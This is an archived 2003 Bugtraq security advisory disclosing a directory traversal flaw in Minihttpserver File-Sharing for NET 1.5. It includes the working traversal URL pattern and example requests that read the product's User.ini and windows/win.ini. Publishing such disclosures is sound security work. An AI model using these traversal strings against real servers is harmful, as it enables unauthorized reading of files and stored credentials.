| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20031003131428.1897.qmail@sf-www2-symnsj.securityfocus.com> Date: 3 Oct 2003 13:14:28 -0000 From: Bahaa Naamneh <b_naamneh@...mail.com> To: bugtraq@...urityfocus.com Subject: Minihttpserver File-Sharing for NET Directory Traversal Vulnerability Minihttpserver File-Sharing for NET Directory Traversal Vulnerability Affected Systems: File-Sharing for NET version: 1.5 (and possibly earlier versions) Vendor: Minihttpserver - http://www.minihttpserver.net Issue: Directory Traversal Vulnerability Released: 2 October 2003 Introduction: ============= "File Sharing for net is a complete, secure web server that shares your business documents and files over the web: remote users only need browsers to view your files. Share, transfer files securely with colleagues." - Vendors Description [ http://www.minihttpserver.net ] Details: ======== File-Sharing for NET has a Directory Traversal Vulnerability Using the string '../' or '..\' in a URL, an attacker can gain read access to any file outside of the intended web-published file system directory. http://[target]/../../../existing_file http://[target]\..\..\..\existing_file Examples: --------- http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini http://127.0.0.1/../../../windows/win.ini Vendor status: ============== The vendor has been informed, and they are fixing this bug. The updated version, when released, can be downloaded from: http://www.minihttpserver.net/fbbs.zip Discovered by/Credit: ===================== Bahaa Naamneh b_naamneh@...mail.com http://www.bsecurity.tk
Powered by blists - more mailing lists